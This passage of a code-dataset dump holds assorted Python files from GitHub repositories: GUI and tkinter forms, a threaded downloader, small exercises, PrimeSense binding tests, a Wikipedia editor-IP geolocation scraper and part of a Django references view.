6/Electronics(Hackerrank).py","file_name":"Electronics(Hackerrank).py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31556770571","text":"import mergit.GUIInterfaces as GUI\nimport mergit.Project as Project\nimport pygame as pyg\nimport mergit.Widgets as Widgets\nimport os\n\n'''\n1. 
GUIController\n'''\n\n\nclass GUIController():\n\n def __init__(self, width, height):\n pyg.font.init()\n self.dialogueBox = Widgets.DisplayMessage()\n self.projectController = Project.ProjectController(self.dialogueBox.sendWarning)\n self._width = width\n self._height = height\n self.width = width\n self.height = height\n\n self._positions = [[0, 0, width, 26], [300, 26, width - 300, height - 26], [0, 26, 300, height - 26]]\n self.positions = [[0, 0, width, 26], [300, 26, width - 300, height - 26], [0, 26, 300, height - 26]]\n\n self.interfaceButtons = GUI.InterfaceButtons(0, 0, width, 26, self.projectController)\n self.interfaceSurface = pyg.Surface((width, 26))\n self.conflictDisplay = GUI.ConflictDisplay(0, 0, width - 300, height - 26, self.projectController)\n self.conflictSurface = pyg.Surface((width - 300, height - 26))\n self.projectDisplay = GUI.ProjectDisplay(0, 0, 300, height - 26, self.projectController)\n self.projectSurface = pyg.Surface((300, height - 26))\n\n self.objects = [self.interfaceButtons, self.conflictDisplay, self.projectDisplay]\n self.surfaces = [self.interfaceSurface, self.conflictSurface, self.projectSurface]\n \n def update(self, mx, my, mb, keys):\n for i in range(len(self.objects)):\n self.objects[i].update(mx-self.positions[i][0], my-self.positions[i][1], mb, keys)\n\n self.projectController.update()\n\n def draw(self, screen):\n for i in range(len(self.objects)):\n self.objects[i].draw(self.surfaces[i])\n screen.blit(self.surfaces[i], (self.positions[i][0], self.positions[i][1]))\n\n def resize(self, newWidth, newHeight, scalex, scaley):\n X = 0\n Y = 1\n WIDTH = 2\n HEIGHT = 3\n\n self.width = newWidth\n self.height = newHeight\n width = self._width\n height = self._height\n scales = []\n\n # Interface Display\n i = 0\n nscalex = newWidth / self._width # scale based off screen size\n nscaley = newHeight / self._height\n self.interfaceSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT]))\n scales.append([nscalex, nscaley])\n\n # Conflict Display\n i = 1\n nscalex = newWidth / self._width # scale base of screen size\n nscaley = (newHeight - self._positions[i][Y]) / (self._positions[i][HEIGHT]) # extend screen from starting point to end of the screen\n self.conflictSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT] * nscaley))\n scales.append([nscalex, nscaley])\n\n # Project Display\n i = 2\n nscalex = newWidth / self._width # scale base of screen size\n nscaley = (newHeight - self._positions[i][Y]) / (self._positions[i][HEIGHT]) # extend screen from starting point to end of the screen\n self.projectSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT] * nscaley))\n scales.append([nscalex, nscaley])\n\n self.surfaces = [self.interfaceSurface, self.conflictSurface, self.projectSurface]\n\n # scale x positions of screens\n for i in range(len(self.positions)):\n self.positions[i][0] = self._positions[i][0] * scales[i][X]\n self.objects[i].resize(scales[i][X], scales[i][Y])\n","repo_name":"Tristhal/MerGit","sub_path":"mergit/GUIController.py","file_name":"GUIController.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25551964269","text":"import tkinter\r\nimport tkinter as tk\r\nfrom tkinter.ttk import *\r\nfrom tkinter import Label,Entry,Radiobutton,StringVar,Button,re,IntVar,Tk,DISABLED,NORMAL,END\r\nfrom MEMBERreg.Model import FormValues\r\nfrom 
tkcalendar import DateEntry\r\nfrom tkinter import messagebox\r\nfrom tkinter.ttk import *\r\nimport re\r\n\r\nclass MyForm:\r\n no1=\"\"\r\n dt=\"\"\r\n fnm=\"\"\r\n email1=\"\"\r\n dob1=\"\"\r\n v=\"\"\r\n mobno1=\"\"\r\n variable1=\"\"\r\n Ft=\"\"\r\n\r\n def clearScreen(self):\r\n self.no1.delete(0,tk.END)\r\n self.dt.delete(0,tk.END)\r\n self.fnm.delete(0,tk.END)\r\n self.email1.delete(0,tk.END)\r\n self.dob1.delete(0,tk.END)\r\n self.mobno1.delete(0,tk.END)\r\n self.Ft.delete(0,tk.END)\r\n\r\n def sub(self):\r\n no=self.no1.get()\r\n dt1=self.dt.get()\r\n name=self.fnm.get()\r\n email=self.email1.get()\r\n dob=self.dob1.get()\r\n gender=self.v.get()\r\n mobno=self.mobno1.get()\r\n ty=self.variable1.get()\r\n square=self.Ft.get()\r\n\r\n root=\"\"\r\n print(no, \" \", dt1, \" \", name, \" \", email, \" \", dob, \" \", gender, \" \", mobno, \" \", ty, \" \", square)\r\n #self.close()\r\n #ope=operator()\r\n #res=ope.show(no,dt1,name,email,dob,gender,mobno, ty,square)\r\n\r\n\r\n # def close(self):\r\n # self.root.destroy()\r\n MsgBox = tk.messagebox.askokcancel('Registration', 'Are you sure you want to submit form',\r\n icon='warning')\r\n\r\n # if MsgBox == 'yes':\r\n # self.root.destroy()\r\n # else:\r\n # tk.messagebox.showinfo('Return', 'You will now return to the application screen')\r\n #self.root.destroy()\r\n mm = FormValues()\r\n mm.Values(no, dt1, name, email, dob, gender, mobno, ty, square)\r\n s = self.clearScreen()\r\n\r\n def cooun(self):\r\n aa=FormValues()\r\n no = self.no1.get()\r\n bb=aa.cn()\r\n print(bb,\"dfhghjk\")\r\n self.no1.insert(tk.END,bb)\r\n\r\n\r\n def NewForm(self):\r\n self.root =Tk()\r\n self.root.geometry(\"600x600\")\r\n self.root.title(\"Member Registration Form\")\r\n style = Style()\r\n style.configure('r.TLabel', font=('camel', 17, 'bold'), foreground='black')\r\n style.configure(\"wb.TLabel\", font=('camel', 10), foreground=\"black\")\r\n style.configure('g.TButton', font=('camel', 13, 'bold'), foreground='black')\r\n style.configure('f.TEntry', font=('camel', 10, 'bold'), foreground='black')\r\n\r\n ll=Label(self.root,text=\"Member Registration\",style=\"r.TLabel\")\r\n ll.place(x=140,y=35)\r\n\r\n no = Label(self.root, text=\"No\", style=\"wb.TLabel\")\r\n no.place(x=50, y=110)\r\n ob = tkinter.StringVar()\r\n self.no1 = Entry(self.root, textvariable=ob,style=\"f.TEntry\")\r\n self.no1.place(x=130, y=110)\r\n self.no1.insert(0, \"enter R/C no\")\r\n self.no1.configure(state=NORMAL)\r\n\r\n # ff = FormValues()\r\n # a=ff.cn()\r\n # #self.no1.insert(tk.END,a[0][0])\r\n dat = Label(self.root, text=\"Date\",style=\"wb.TLabel\" )\r\n dat.place(x=290, y=110)#\r\n self.dt = Entry(self.root,style=\"f.TEntry\")\r\n self.dt.place(x=340, y=110)\r\n self.dt.insert(0, \"YYYY-MM-DD\")\r\n self.dt.configure(state=NORMAL)\r\n\r\n name = Label(self.root, text=\"Name\",style=\"wb.TLabel\")\r\n name.place(x=50, y=150)\r\n self.fnm = Entry(self.root,style=\"f.TEntry\")\r\n self.fnm.place(x=130, y=150,width=300)\r\n self.fnm.insert(0,\"Please Enter Full Name\")\r\n self.fnm.configure(state=NORMAL)\r\n\r\n email = Label(self.root, text=\"Email\",style=\"wb.TLabel\")\r\n email.place(x=50, y=190)\r\n self.email1 = Entry(self.root,style=\"f.TEntry\")\r\n self.email1.place(x=130, y=190,width=300)\r\n self.email1.insert(0, \"email@gmail.com\")\r\n self.email1.configure(state=NORMAL)\r\n #\r\n dob = Label(self.root, text=\"DOB\", style=\"wb.TLabel\")\r\n dob.place(x=50, y=230)\r\n self.dob1 =Entry(self.root)#,pattern=\"yyyy-mm-dd\")\r\n self.dob1.place(x=130, 
y=230)\r\n\r\n mobno = Label(self.root, text=\"Mobno\", width=20,style=\"wb.TLabel\")\r\n mobno.place(x=50, y=270)\r\n self.mobno1 = Entry(self.root,style=\"f.TEntry\")\r\n self.mobno1.place(x=130, y=270)\r\n\r\n Ty = Label(self.root, text=\"Type\",style=\"wb.TLabel\")\r\n Ty.place(x=50, y=310)\r\n\r\n OptionList = [\"Select\",\r\n \"Residential\",\r\n \"Commercial\"\r\n ]\r\n self.variable1 = tkinter.StringVar(self.root)\r\n self.variable1.set(OptionList[0])\r\n opl = tkinter.OptionMenu(self.root, self.variable1, *OptionList)\r\n opl.config(width=8, font=('Helvetica', 12))\r\n opl.place(x=130, y=310)\r\n\r\n sq = Label(self.root, text=\"Sq/Ft\", width=20, style=\"wb.TLabel\")\r\n sq.place(x=50, y=370)\r\n self.Ft = Entry(self.root,style=\"f.TEntry\")\r\n self.Ft.place(x=130, y=370)\r\n\r\n self.v = tkinter.StringVar()\r\n tk=Label(self.root, text=\"Gender\",style=\"wb.TLabel\")\r\n tk.place(x=50, y=420)\r\n tk=Radiobutton(self.root, text=\"male\", variable=self.v, value=\"male\")\r\n tk.place(x=130, y=420)\r\n tk=Radiobutton(self.root, text=\"female\", variable=self.v, value=\"female\")\r\n tk.place(x=200, y=420)\r\n\r\n CheckVar1 = IntVar()\r\n C1 = Checkbutton(self.root, text=\"Accept Terms and Conditions\", variable=CheckVar1,onvalue=1, offvalue=0)\r\n C1.place(x=50,y=460)\r\n Button(self.root, text='Register', command=self.sub,style = 'g.TButton').place(x=180, y=510)\r\n\r\n def on_click(event):\r\n self.no1.configure(state=NORMAL)\r\n self.no1.delete(0,END)\r\n\r\n def on_click1(event):\r\n self.dt.configure(state=NORMAL)\r\n self.dt.delete(0, END)\r\n\r\n def on_click2(event):\r\n self.fnm.configure(state=NORMAL)\r\n self.fnm.delete(0,END)\r\n\r\n def on_click3(event):\r\n self.email1.configure(state=NORMAL)\r\n self.email1.delete(0, END)\r\n\r\n # make the callback only work once\r\n\r\n # self.no1.unbind('',self. 
on_click_id)\r\n\r\n self.on_click_id = self.no1.bind( '',on_click)\r\n self.on_click_id = self.dt.bind('', on_click1)\r\n self.on_click_id = self.fnm.bind('', on_click2)\r\n self.on_click_id = self.email1.bind('', on_click3)\r\n self.root.mainloop()\r\n","repo_name":"jyotiadate/Smart_Society_Maintenance","sub_path":"MEMBERreg/RegisterForm.py","file_name":"RegisterForm.py","file_ext":"py","file_size_in_byte":6846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21343989309","text":"import os\nimport threading\nimport urllib.request\nimport time\n\nfrom time import sleep\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Queue\n\n\nqueue_lock = threading.Lock()\nqueue = Queue()\n\n\nclass DownloadWorker(threading.Thread):\n \"\"\"Worker for downloading data from URL:\n\n queue - array of URLs for download\n queue_lock - threading Lock object\n BANDWIDTH - stream rate, byte/s\n \"\"\"\n\n def __init__(self, queue, queue_lock, BANDWIDTH):\n super(DownloadWorker, self).__init__()\n self.queue = queue\n self.queue_lock = queue_lock\n self.BANDWIDTH = BANDWIDTH\n\n def run(self):\n while True:\n nexturl = self.grab_next_url()\n if nexturl is None:\n break\n self.download_file(nexturl[0], nexturl[1], self.BANDWIDTH)\n\n def grab_next_url(self):\n \"\"\"\n Get next url from queue.\n \"\"\"\n self.queue_lock.acquire(1)\n if queue.empty() is True:\n nexturl = None\n else:\n nexturl = queue.get_nowait()\n self.queue_lock.release()\n return nexturl\n\n def download_file(self, file_url, local_filename, BANDWIDTH):\n \"\"\"Downloading data from url to local folder.\n\n file_url - link to download file\n local_filename - filename for local recording\n BANDWIDTH - stream rate, byte/s\n \"\"\"\n global total_size # total size of all downloads\n SECOND = timedelta(seconds=1)\n file = os.path.join(UPLOAD_DIR + '/' + local_filename)\n with urllib.request.urlopen(file_url) as data:\n with open(file, 'wb') as filename:\n for chunk in iter(lambda: data.read(BANDWIDTH), b\"\"):\n last_time = datetime.now() # start time for writing chunk\n filename.write(chunk)\n time_passed = datetime.now() - last_time # time delta\n if time_passed < SECOND: # if have extra time - wait\n time.sleep((SECOND - time_passed).microseconds /\n 1000000.0)\n size = os.path.getsize(file)\n total_size += size\n\n\ndef main(urls_list, threads_count, total_BANDWIDTH):\n \"\"\"Main process for downloading data from URL-addresses.\n Reads a file and adds links in queue, init threads:\n\n urls_list - file with array of URLs for download\n threads_count - count of threads/workers\n BANDWIDTH - total stream rate for all threads, byte/s\n \"\"\"\n print('\\n' + '-' * 100 + '\\nSTARTED\\n' + '-' * 100 + '\\n\\n')\n start = time.time() # starting process time\n with open(urls_list) as links:\n for url in links:\n queue.put(url.rstrip().split(' '))\n\n BANDWIDTH = total_BANDWIDTH // threads_count # rate for a single stream\n for i in range(threads_count):\n thread = DownloadWorker(queue, queue_lock, BANDWIDTH)\n thread.start()\n while threading.active_count() > 2:\n time.sleep(1)\n\n print('-' * 100 + '\\nFINISHED:\\n')\n end = time.time() # ending process time\n print('Summary downloading size : ' +\n '%.1f mb (%s bytes)' % ((total_size / 1000000), total_size))\n print('Total downloading time: ' + '%.2f seconds\\n' % (end - start) + \\\n '-' * 100 + '\\n')\n\n\nif __name__ == '__main__':\n\n from settings import threads_count, urls_list, upload_folder, \\\n 
total_BANDWIDTH, total_size, UPLOAD_DIR\n\n main(urls_list, threads_count, total_BANDWIDTH)\n","repo_name":"woobinda/console-downloader","sub_path":"console-utility/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15800948338","text":"import random\nimport time\nimport numpy\nimport pygame\nimport copy\nfrom pygame.locals import *\n\nfrom GlobalFunctions import *\n\nclass Particle:\n position = [0, 0]\n size = 0\n decrease_ratio = 0.0\n left_time = 0\n def __init__(self, position, size = 1, life_time = 120):\n self.position = position\n if position[0] < 0:\n self.position[0] = 0\n\n if position[1] < 0:\n self.position[1] = 0\n self.size = size\n self.decrease_ratio = size / life_time\n self.left_time = life_time\n\n def updateParticle(self):\n self.left_time -= 1\n self.size -= self.decrease_ratio\n\n def renderParticle(self, screen):\n pygame.draw.rect(\n screen,\n (\n 97 + random.randint(-10, 10),\n 222 + random.randint(-10, 10),\n 42 + random.randint(-10, 10)\n ),\n pygame.Rect(self.position[0], self.position[1], self.size, self.size))\n\n def visible(self):\n if self.size > 0:\n return True\n else:\n return False\n\n","repo_name":"Cezary-Androsiuk/Simple_Villager_Defence_game_python_pygame","sub_path":"Particle.py","file_name":"Particle.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1592145137","text":"# understanding the use of next and enumerate in this context\n\ndata = 'bvwbjplbgvbhsrlpgdmjqwftvncz'\n\n# print(next(i for i,c in enumerate(data) if len(set(data[i-4:i]))==4))\n\n# It appears that this is essentially a for loop that \"loops\" through the data until if finds\n# four unique letters. \"next\" keeps the loop going. enumerate returns an index (i) and a \n# value (c). 
i is used to index the data and is eventually returned as the answer.\n\n\nlist1 = [1,2,3,4,5]\nl_list = enumerate(list1)\nprint(next(l_list))\n\nlist2 = ['a','b','c','d']\nfor count, value in enumerate(list2,start=1):\n print(count, value)\n\ndef even_items(iterable):\n values = []\n for index, value in enumerate(iterable, start=1):\n if not index % 2:\n values.append(value)\n return values\n\n# The following three lines of code all out put ['b', 'd']\nprint(even_items(list2))\nprint([v for i,v in enumerate(list2,start=1) if not i % 2])\nprint(list2[1::2])\n\na = list2[1::2]\nprint(a)\n\n\n","repo_name":"n7tms/AOC","sub_path":"AOC2022/202206.z.py","file_name":"202206.z.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70873343849","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\n\na=pd.read_csv('train2.csv')\ncolumns1 = ['perX',\t'perY',\t'topLeftX',\t'topLeftY',\t'botRightX','botRightY','matchedIndex']\nlabeledOutcome = a['timePress']\nm = len(labeledOutcome)\npredictors = pd.DataFrame(a, columns=columns1)\n# predictors1 = pd.DataFrame(a, columns=columns1,np.ones(m))\nlabeledOutcome = a['timePress']\nmodel = LinearRegression()\nmodel.fit(predictors, labeledOutcome)\n\ni = 0\nmeanSq = []\nfor i in range(60):\n oneOff = a[columns1][i:i+1]\n target = a['timePress'][i]\n # model.fit(predictors, target)\n yfit = model.predict(oneOff)\n meanSq.append((yfit[0]-target)* (yfit[0]-target))\n# print (np.sqrt(np.mean(meanSq)))\n#\n# personX = a['perX'].values\n# personY = a['perY'].values\n# topLeftX = a['topLeftX'].values\n# topLeftY = a['topLeftY'].values\n# botRightX = a['botRightX'].values\n# botRightY = a['botRightY'].values\n# matchedIndex = a['matchedIndex'].values\n# m = len(matchedIndex)\n# bias = np.ones(m)\n# X = np.array([bias, personX, personY,topLeftX,topLeftY,botRightX,botRightY,matchedIndex]).T\n#\n# B = np.array([0, 0, 0])\n# Y = np.array(write)\n","repo_name":"Crolabear/jump_jump","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34055479329","text":"import unittest\nimport subprocess\nimport os\nimport primesense\nimport inspect\nimport tokenize\nimport logging\nimport ConfigParser\nfrom io import StringIO\nfrom cbinder.generator import delimiters\n\nconfig = ConfigParser.ConfigParser()\nconfig.read(\"../bin/sources.ini\")\n\n\nclass TestBindings(unittest.TestCase):\n GEN_DIR = primesense.__path__[0]\n GEN_ONI = os.path.join(GEN_DIR, \"_openni2.py\")\n GEN_NITE = os.path.join(GEN_DIR, \"_nite2.py\")\n\n def test_openni2_bindings(self):\n if os.path.exists(self.GEN_ONI):\n os.unlink(self.GEN_ONI)\n subprocess.check_call([\"python\", \"../bin/build_openni.py\"])\n self.assertTrue(os.path.exists(self.GEN_ONI))\n \n from primesense import _openni2\n from primesense import openni2\n \n openni2.initialize()\n ver = openni2.get_version()\n openni2.unload()\n\n self.assertEqual(ver.major, openni2.c_api.ONI_VERSION_MAJOR)\n self.assertEqual(ver.minor, openni2.c_api.ONI_VERSION_MINOR)\n\n h_file = os.path.join(config.get(\"headers\", \"openni_include_dir\"), \"OpenNI.h\")\n\n self.check_unexposed_functions(openni2, _openni2, h_file, [\"oniGetExtendedError\"])\n self.check_missing_names_by_prefix(openni2, h_file, \"DEVICE_PROPERTY_\", \"ONI_\")\n 
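        # The prefix sweeps above and below scan OpenNI.h for DEVICE_PROPERTY_*
        # and STREAM_PROPERTY_* constants and assert that each one is exposed
        # by the wrapper under the ONI_ Python prefix.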
self.check_missing_names_by_prefix(openni2, h_file, \"STREAM_PROPERTY_\", \"ONI_\")\n \n\n def _get_identifiers(self, mod):\n source = inspect.getsource(mod)\n g = tokenize.generate_tokens(StringIO(unicode(source)).readline)\n return set(tokval for toktype, tokval, _, _, _ in g if toktype == tokenize.NAME)\n \n def _get_unexposed_functions(self, wrapper_mod, autgen_mod):\n identifiers = self._get_identifiers(wrapper_mod)\n for func in autgen_mod.all_funcs:\n if func.__name__ not in identifiers:\n yield func.__name__\n \n def check_unexposed_functions(self, wrapper_mod, autgen_mod, hfile, to_ignore = []):\n hfile_tokens = set(delimiters.split(open(hfile, \"r\").read()))\n fail = False\n for func in self._get_unexposed_functions(wrapper_mod, autgen_mod):\n if func in to_ignore:\n continue\n if func in hfile_tokens:\n fail = True\n logging.error(\"%s is not exposed by wrapper <<< FIX ME\", func)\n else:\n logging.warning(\"%s is missing from wrapper (not exposed in %s either)\", func, os.path.basename(hfile))\n \n if fail:\n self.fail(\"Found unexposed API function\")\n \n def check_missing_names_by_prefix(self, wrapper_mod, hfile, prefix, pyprefix):\n identifiers = self._get_identifiers(wrapper_mod)\n hfile_tokens = set(delimiters.split(open(hfile, \"r\").read()))\n \n fail = False\n for tok in hfile_tokens:\n if tok.startswith(prefix):\n pytok = pyprefix + tok\n if pytok not in identifiers:\n logging.error(\"%s is missing\", pytok)\n fail = True\n\n if fail:\n self.fail(\"Found unexposed properties\")\n \n def test_nite_bindings(self):\n if os.path.exists(self.GEN_ONI):\n os.unlink(self.GEN_ONI)\n subprocess.check_call([\"python\", \"../bin/build_openni.py\"])\n self.assertTrue(os.path.exists(self.GEN_ONI))\n\n if os.path.exists(self.GEN_NITE):\n os.unlink(self.GEN_NITE)\n subprocess.check_call([\"python\", \"../bin/build_nite.py\"])\n self.assertTrue(os.path.exists(self.GEN_NITE))\n\n from primesense import _nite2\n from primesense import nite2\n\n nite2.initialize()\n ver = nite2.get_version()\n nite2.unload()\n\n self.assertEqual(ver.major, nite2.c_api.NITE_VERSION_MAJOR)\n self.assertEqual(ver.minor, nite2.c_api.NITE_VERSION_MINOR)\n\n h_file = os.path.join(config.get(\"headers\", \"nite_include_dir\"), \"NiTE.h\")\n self.check_unexposed_functions(nite2, _nite2, h_file)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","repo_name":"tomerfiliba/PrimeSense","sub_path":"tests/test_bindings.py","file_name":"test_bindings.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"38904252709","text":"#chapter1 problem 6\r\n\r\ndef compress(astring, checkCapital=True):\r\n size = len(astring)\r\n\r\n count = 1\r\n highest_count = 2\r\n \r\n if not checkCapital:\r\n astring.lower()\r\n\r\n\r\n #cs = compressedstring\r\n cs = ''\r\n for i in range(0, size):\r\n current = astring[i]\r\n next = None\r\n #check if it's the last:\r\n if i == size - 1:\r\n cs += current + str(count)\r\n \r\n elif i + 1 < size:\r\n next = astring[i+1]\r\n if next == current:\r\n count += 1\r\n \r\n\r\n else:\r\n cs += current + str(count)\r\n count = 1\r\n else:\r\n print('else clause: for loop: compress(astring)')\r\n \r\n if len(cs) >= len(astring):\r\n return astring\r\n else:\r\n return cs\r\n \r\n\r\ndef test():\r\n TEST1 = 'aaabbbcdddeefffff'\r\n expected1 = 'a3b3c1d3e2f5'\r\n result1 = compress(TEST1)\r\n print(result1 == expected1)\r\n TEST2 = 'abbcdefghij'\r\n result2 = compress(TEST2)\r\n print(TEST2 
== result2)\r\n TEST3 = 'AaaBbBcDeFffffGGGg'\r\n #wrong_result = 'A1a2B1b1B1c1D1e1F1f4G3g1'\r\n result = compress(TEST3, True)\r\n print(result == TEST3)\r\n TEST4 = compress(TEST3, True)\r\n print(TEST4 == TEST3)\r\n\r\ntest()\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"nelliesnoodles/CrackingTheCodePython","sub_path":"CCinterview_chapter1/ch1_6.py","file_name":"ch1_6.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31724158616","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open('requirements.txt') as f:\n required = f.read().splitlines()\n\nsetuptools.setup(\n name=\"pygerbil\",\n version=\"0.0.1\",\n author=\"Rungsiman Nararatwong\",\n author_email=\"rungsiman@me.com\",\n description=\"A Python wrapper of GERBIL\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=required,\n url=\"https://github.com/rungsiman/pygerbil\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"rungsiman/pygerbil","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24430893317","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n \n # Takes more gas to do a revolution than there is in the stations\n if sum(cost) > sum(gas):\n return -1\n \n n = len(gas)\n startingIndex = 0\n while startingIndex < n:\n # Attempts to complete a trip around the stations\n currentGasLevel = 0\n for i in range(n):\n j = (i + startingIndex) % n\n currentGasLevel += gas[j] # Fill up at station j\n \n currentGasLevel -= cost[j] # Cost to get to station (j+1)\n \n # Can the car make it to the next station\n if currentGasLevel < 0:\n startingIndex = j + 1\n break\n \n else:\n # Only executed if it made a full revolution\n return startingIndex\n \n # Returns if there is no valid index\n return -1","repo_name":"devenperez/leetcode","sub_path":"134-gas-station/134-gas-station.py","file_name":"134-gas-station.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1511905064","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport datetime\nimport random\nimport re\nimport json\n\n\nrandom.seed(datetime.datetime.now())\n\n\n# Get the URLs of related article pages\ndef getLinks(articleUrl):\n html = urlopen(articleUrl)\n bsObj = BeautifulSoup(html, 'lxml')\n return bsObj.find('div', {'id': 'bodyContent'}).findAll('a', href=re.compile('^(/wiki/)((?!:).)*$'))\n\n\n# Extract the IPs of anonymous editors from the wiki revision-history page\ndef getHistoryIPs(pageUrl):\n pageUrl = pageUrl.replace('/wiki/', '')\n historyURL = 'http://en.wikipedia.org/w/index.php?title=' + pageUrl + '&action=history'\n print('history url:' + historyURL)\n html = urlopen(historyURL)\n bsObj = BeautifulSoup(html, 'lxml')\n ipAddresses = bsObj.findAll('a', {'class': 'mw-userlink mw-anonuserlink'})\n addressList = set()\n for ipAddress in ipAddresses:\n addressList.add(ipAddress.get_text())\n return addressList\n\n\n# Call the freegeoip API to look up the country, region and city for an IP\ndef getCountry(ipAddress):\n try:\n response = 
urlopen('http://freegeoip.net/json/' + ipAddress).read().decode('utf-8')\n except HTTPError:\n return None\n responseJson = json.loads(response)\n return [responseJson.get('country_name'), responseJson.get('region_name'), responseJson.get('city')]\n\n# Page where the crawl starts\nlinks = getLinks('http://en.wikipedia.org/wiki/Python_(programming_language)')\n\n# Keep crawling until there is nothing left to crawl\nwhile len(links) > 0:\n for link in links:\n print('----------------')\n historyIPs = getHistoryIPs(link.attrs['href'])\n for historyIP in historyIPs:\n country = getCountry(historyIP)\n if country is not None:\n print(historyIP + ' is from ' + country[0] + ', ' + country[1] + ', ' + country[2])\n\n newLink = links[random.randint(0, len(links) - 1)].attrs['href']\n links = getLinks(newLink)\n","repo_name":"Patrickctyyx/WebScrapers","sub_path":"10.14 获得wiki编辑者地区.py","file_name":"10.14 获得wiki编辑者地区.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70235015528","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import Prefetch\nfrom django.http import Http404, HttpResponse\nfrom django.http.request import HttpRequest\nfrom django.shortcuts import get_object_or_404\nfrom django.template.defaultfilters import wordwrap\nfrom django.template.response import TemplateResponse\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_control, never_cache\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.common import CampId\nfrom cciw.utils.views import for_htmx\n\nfrom ...applications import (\n applications_for_camp,\n)\nfrom ...email import (\n make_ref_form_url,\n send_nag_by_officer,\n send_reference_request_email,\n)\nfrom ...forms import (\n AdminReferenceForm,\n CorrectRefereeDetailsForm,\n SendNagByOfficerForm,\n SendReferenceRequestForm,\n)\nfrom ...models import (\n Referee,\n Reference,\n ReferenceAction,\n add_previous_references,\n get_previous_references,\n)\nfrom ..referees import get_initial_reference_form\nfrom ..utils.auth import (\n camp_admin_required,\n)\nfrom ..utils.breadcrumbs import leaders_breadcrumbs, with_breadcrumbs\nfrom ..utils.campid import get_camp_or_404\nfrom ..utils.htmx import add_hx_trigger_header\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@never_cache\n@with_breadcrumbs(leaders_breadcrumbs)\n@for_htmx(use_block_from_params=True)\ndef manage_references(request, camp_id: CampId):\n # If referee_id is set, we just want to update part of the page.\n referee_id = request.GET.get(\"referee_id\")\n officer = None\n officer_id = request.GET.get(\"officer_id\")\n if officer_id is not None:\n try:\n officer = User.objects.get(id=int(officer_id))\n except (ValueError, User.DoesNotExist):\n raise Http404\n camp = get_camp_or_404(camp_id)\n\n if referee_id is None:\n apps = applications_for_camp(camp, officer_ids=[officer_id] if officer is not None else None)\n app_ids = [app.id for app in apps]\n referees = Referee.objects.filter(application__in=app_ids).order_by()\n else:\n referees = Referee.objects.filter(pk=referee_id).order_by()\n\n referees = referees.prefetch_related(\n Prefetch(\"actions\", queryset=ReferenceAction.objects.select_related(\"user\"))\n ).select_related(\"reference\", \"application\", \"application__officer\")\n\n all_referees = list(referees)\n if \"ref_email\" in request.GET:\n ref_email = request.GET[\"ref_email\"]\n all_referees = [r for r in 
all_referees if r.email.lower() == ref_email.lower()]\n else:\n ref_email = None\n\n for referee in all_referees:\n referee.sort_key = [\n # Received come last:\n referee.reference_is_received(),\n # Not requested come first:\n referee.reference_was_requested(),\n # Then sort by:\n referee.application.officer.first_name,\n referee.application.officer.last_name,\n referee.name,\n ]\n # Note that we add this as an attribute because we also need to sort by\n # the same key client side.\n if referee.reference_is_received():\n continue # Don't need the following\n # decorate each Reference with suggested previous References.\n add_previous_references(referee)\n\n all_referees.sort(key=lambda referee: referee.sort_key)\n\n return TemplateResponse(\n request,\n \"cciw/officers/manage_references.html\",\n {\n \"officer\": officer,\n \"camp\": camp,\n \"title\": f\"Manage references: {camp.nice_name}\",\n \"ref_email_search\": ref_email,\n \"all_referees\": all_referees,\n },\n )\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef correct_referee_details(request: HttpRequest, camp_id: CampId, referee_id: int):\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n if request.method == \"POST\":\n if \"save\" in request.POST:\n form = 